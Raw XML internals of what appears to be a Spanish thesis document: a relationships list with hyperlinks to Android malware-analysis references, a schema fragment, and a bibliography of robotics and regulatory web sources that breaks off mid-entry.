Target="media/image48.png"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.png"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.researchgate.net/publication/308180878_Structural_analysis_of_packing_schemes_for_extracting_hidden_codes_in_mobile_malware" TargetMode="External"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://media.defcon.org/DEF%20CON%2022/DEF%20CON%2022%20presentations/DEF%20CON%2022%20-%20Strazzere-and-Sawyer-Android-Hacker-Protection-Level-UPDATED.pdf" TargetMode="External"/><Relationship Id="rId14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header" Target="header7.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.android.com/develop/ui/views/layout/webapps/webview" TargetMode="External"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ibm.com/docs/en/zos/2.4.0?topic=rules-pkcs-padding-method" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developers.google.com/android/play-protect/potentially-harmful-applications" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bbc.com/news/technology-21860360" TargetMode="External"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.genymotion.com/hc/en-us/articles/4402754157969-How-to-access-a-local-host-or-service-from-a-virtual-device" TargetMode="External"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer9.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image" Target="media/image17.png"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://metrika.yandex.ru/" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.png"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/skylot/jadx" TargetMode="External"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://users.ece.cmu.edu/~tvidas/papers/SPSM14.pdf" TargetMode="External"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.oracle.com/javase%2F8%2Fdocs%2Fapi%2F%2F/java/net/CookieManager.html" TargetMode="External"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.android.com/topic/performance/baselineprofiles/overview?hl=es-419" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.android.com/build/shrink-code" TargetMode="External"/><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footer" Target="footer7.xml"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.europapress.es/portaltic/ciberseguridad/noticia-malware-chameleon-bloquea-huella-dactilar-forzar-introduccion-pin-hacerse-cuentas-bancarias-20231229135249.html" TargetMode="External"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.android.com/reference/android/Manifest.permission" TargetMode="External"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.google.com/store/apps/details?id=com.elink.fittrackhealth.pro" TargetMode="External"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/raulng9/TFM_MalwareAnalysis" TargetMode="External"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header10.xml"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://source.android.com/docs/core/permissions/privacy-indicators" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer4.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.researchgate.net/publication/312129902_Android_Fragmentation_Classification_Causes_Problems_and_Solutions" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://kclpure.kcl.ac.uk/ws/portalfiles/portal/112357801/The_Evolution_of_Android_Malware_TAM_2017_GREEN_AAM.pdf" TargetMode="External"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cis.upenn.edu/~mhnaik/papers/fse12_full.pdf" TargetMode="External"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.sqlite.org/tempfiles.html" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/CalebFenton/simplify" TargetMode="External"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.ghidra-sre.org/" TargetMode="External"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.synopsys.com/blogs/software-security/cve-2020-7958-trustlet-tee-attack.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item3.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId67" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.acra.ch/" TargetMode="External"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer10.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer5.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://play.google.com/store/apps/details?id=com.google.android.marvin.talkback&amp;hl=en" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.xatakandroid.com/seguridad/asi-logra-saltarse-biometria-movil-peligroso-troyano-bancario-chameleon" TargetMode="External"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.android.com/reference/android/accessibilityservice/AccessibilityService" TargetMode="External"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header8.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/List_of_file_signatures" TargetMode="External"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://android.googlesource.com/platform/frameworks/webview/+/f989a7846d5fe4116de1a0635a8aade09d2be7b2/chromium/java/com/android/webview/chromium/WebViewChromiumFactoryProvider.java" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cs.tufts.edu/comp/116/archive/fall2017/tzhu.pdf" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEF%20CON%2025%20-%20Slava-Makkaveev-and-Avi-Bashan-Unboxing-Android.pdf" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.researchgate.net/publication/262412421_DIVILAR_Diversifying_intermediate_language_for_anti-repackaging_on_Android_platform" TargetMode="External"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.android.com/studio/run/emulator" TargetMode="External"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Unstructured_Supplementary_Service_Data" TargetMode="External"/><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image" Target="media/image4.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://newsukraine.rbc.ua/news/android-virus-chameleon-banking-learns-to-1703623824.html" TargetMode="External"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.android.com/reference/android/service/notification/NotificationListenerService" TargetMode="External"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header9.xml"/></Relationships>
</file>

<file path=word/_rels/header2.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D0200E1FDE401D49A99B137CE017A12D" ma:contentTypeVersion="0" ma:contentTypeDescription="Crear nuevo documento." ma:contentTypeScope="" ma:versionID="aee5a24b1da9ab804ddafdb7a120e7f7">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="249753e9e89f16c5923e78ee5e63706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Act</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{00315C04-8A26-49C6-9E8B-07622D12F0AD}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>ActionLib</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>http://wiki.ros.org/actionlib</b:Title>
    <b:RefOrder>1</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>LCM</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{16C298BA-6964-49EC-9C3E-8A40769AB057}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>LCM</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>https://lcm-proj.github.io/</b:Title>
    <b:RefOrder>2</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>ACH15</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{8147CF16-D4F7-4CBE-9754-CC12F352F033}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>ACH</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>http://code.golems.org/pkg/ach/manual/</b:Title>
    <b:Year>2015</b:Year>
    <b:RefOrder>3</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Rob</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{F18D17D3-2649-4FD9-AE89-F08F6F006B01}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Robocomp</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>https://robolab.unex.es/index.php/robocomp/</b:Title>
    <b:RefOrder>4</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>FIR</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{974D94F3-20E3-47CA-A42F-E40D741B9B23}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>FIRST</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>https://www.firstinspires.org/robotics/frc</b:Title>
    <b:RefOrder>5</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Uni19</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{52C2D772-B665-4A31-8F86-6B9D0B9554A0}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Unimate</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>https://robotsinaction.com/el-primer-robot-industrial-unimate/</b:Title>
    <b:Year>2019</b:Year>
    <b:Month>2</b:Month>
    <b:Day>17</b:Day>
    <b:RefOrder>6</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>IGV20</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{63F436DF-1632-4CDC-B349-F889FC0DA940}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>IGVC</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>https://robojackets.org/2020/11/03/igvc-retrospective/</b:Title>
    <b:Year>2020</b:Year>
    <b:Month>11</b:Month>
    <b:Day>3</b:Day>
    <b:RefOrder>7</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Rob1</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{46A37291-BE27-413A-BD04-46437AD424AC}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Robocup</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>https://www.robocup.org/</b:Title>
    <b:RefOrder>8</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>ERL</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{FCE13F84-6461-4825-A1D9-387A9EE538A3}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>ERL</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>https://www.eu-robotics.net/robotics_league/</b:Title>
    <b:RefOrder>9</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>IAR</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{2C4C130E-84A1-4F3F-82B6-0B7916A4EFA9}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>IARC</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>https://hmong.es/wiki/International_Aerial_Robotics_Competition</b:Title>
    <b:RefOrder>10</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>MRP</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{6A3F5A45-8281-4528-BEA8-0F3A4ABE2113}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>MRPT</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>https://docs.mrpt.org/reference/latest/</b:Title>
    <b:RefOrder>11</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>ERL20</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{3AFE00AE-A854-4623-85CC-36A723F9F86E}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:First>ERL Rulebook</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>https://www.eu-robotics.net/robotics_league/upload/erl-rulebooks/ERL_Consumer_2020_Updated.pdf</b:Title>
    <b:Year>2020</b:Year>
    <b:Month>09</b:Month>
    <b:Day>30</b:Day>
    <b:RefOrder>12</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Hmo</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{2A14714F-4F88-4312-A52B-C34AFC2D9459}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Hmong</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>https://hmong.es/wiki/Robot_competition</b:Title>
    <b:RefOrder>13</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>MRD</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{BC466CB5-2DC4-453B-A2B8-839E7B43357C}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>MRDS</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>https://social.technet.microsoft.com/wiki/contents/articles/12955.microsoft-robotics-developer-studio-tutorial-en-espanol.aspx</b:Title>
    <b:RefOrder>14</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>htt</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{1B405BA2-A3FF-4F4F-94E5-40CE293139A4}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>https://www.ieee.org/</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>IEEE</b:Title>
    <b:RefOrder>15</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>IEE</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{3BF0A29B-2B69-4DF1-9988-3AEF72F23164}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>IEEE</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>https://www.ieee.org/</b:Title>
    <b:RefOrder>16</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>ERL1</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{3C10F165-D657-43C3-A8BB-3505F7CA1FC7}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>ERL Leon</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>https://sites.google.com/view/erlleon2022/call-for-participation</b:Title>
    <b:RefOrder>17</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>BSD</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{52D1F6D5-B7CA-457B-B607-5896E2B9A655}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>BSD</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>https://opensource.org/licenses/BSD-3-Clause</b:Title>
    <b:RefOrder>18</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>ROS1</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{C453463F-C259-468E-9F6B-EC10A8B7C0BB}</b:Guid>
    <b:Title>https://docs.ros.org/en/rolling/index.html</b:Title>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>ROS 2</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:RefOrder>19</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Leo17</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{6399393F-262D-4849-892F-C22FB251BCFB}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Leon@Home Testbed</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>https://robotica.unileon.es/index.php?title=Testbed</b:Title>
    <b:Year>2017</b:Year>
    <b:Month>03</b:Month>
    <b:Day>16</b:Day>
    <b:RefOrder>20</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Fak18</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{B3382162-18CF-4DDC-A217-D3868AE4D3C0}</b:Guid>
    <b:Title>http://wiki.ros.org/turtlebot3_fake</b:Title>
    <b:Year>2018</b:Year>
    <b:Month>04</b:Month>
    <b:Day>04</b:Day>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Fake Node</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:RefOrder>21</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>RQT18</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{9F1AA3EA-DC32-425E-8D23-01AEF45171FC}</b:Guid>
    <b:Title>http://wiki.ros.org/rqt_graph</b:Title>
    <b:Year>2018</b:Year>
    <b:Month>09</b:Month>
    <b:Day>17</b:Day>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>RQT Graph</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:RefOrder>22</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>ROS</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{4A71BA9D-0D5C-4FF8-B332-68E5E7E3D1F3}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>ROS</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>http://wiki.ros.org/es</b:Title>
    <b:Year>2021</b:Year>
    <b:Month>03</b:Month>
    <b:Day>12</b:Day>
    <b:RefOrder>23</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Gma19</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{F5CEBE0B-221E-4CC6-AF9F-789F64689D69}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Gmapping</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>http://wiki.ros.org/gmapping</b:Title>
    <b:Year>2019</b:Year>
    <b:Month>02</b:Month>
    <b:Day>04</b:Day>
    <b:RefOrder>24</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Gaz14</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{C55C3940-68CF-4441-BFA5-E6318211E603}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Gazebo</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>https://classic.gazebosim.org/</b:Title>
    <b:Year>2014</b:Year>
    <b:RefOrder>25</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Tur22</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{3A500C7A-33B9-4A9B-8255-D2C029148994}</b:Guid>
    <b:Title>https://emanual.robotis.com/docs/en/platform/turtlebot3/overview/</b:Title>
    <b:Year>2022</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>TurtleBot 3</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:RefOrder>26</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Sim16</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{6B864C8B-AF88-4298-8181-1E59F7122ADB}</b:Guid>
    <b:Title>http://wiki.ros.org/navigation/Tutorials/SendingSimpleGoals</b:Title>
    <b:Year>2016</b:Year>
    <b:Month>08</b:Month>
    <b:Day>25</b:Day>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Simple Goals</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:RefOrder>27</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Orb</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{DA6B0A40-C0BD-49BC-9552-9EA504061F2D}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>OrbiOne</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>https://robotnik.eu/es/productos/manipuladores-moviles/manipulador-movil-rb-1/</b:Title>
    <b:RefOrder>28</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>PMB</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{DD421905-9345-455C-BF6F-F10233DBA689}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>PMBOK</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>https://www.pmi.org/pmbok-guide-standards</b:Title>
    <b:RefOrder>29</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>RGD16</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{6D90D648-23A7-4DB2-A61E-8D8A2F3F9066}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>RGDP</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>https://www.boe.es/doue/2016/119/L00001-00088.pdf</b:Title>
    <b:Year>2016</b:Year>
    <b:Month>04</b:Month>
    <b:Day>27</b:Day>
    <b:RefOrder>30</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>BOE17</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{E84157EA-1632-4B00-B563-F440FA8570D8}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>BOE</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>https://www.boe.es/buscar/pdf/2017/BOE-A-2017-12902-consolidado.pdf</b:Title>
    <b:Year>2017</b:Year>
    <b:Month>11</b:Month>
    <b:Day>09</b:Day>
    <b:RefOrder>31</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Seg22</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{7013A6EA-EFBA-4095-8D7C-A1F8F2E39E66}</b:Guid>
    <b:Title>https://www.seg-social.es/wps/portal/wss/internet/Trabajadores/CotizacionRecaudacionTrabajadores/36537?changeLanguage=es</b:Title>
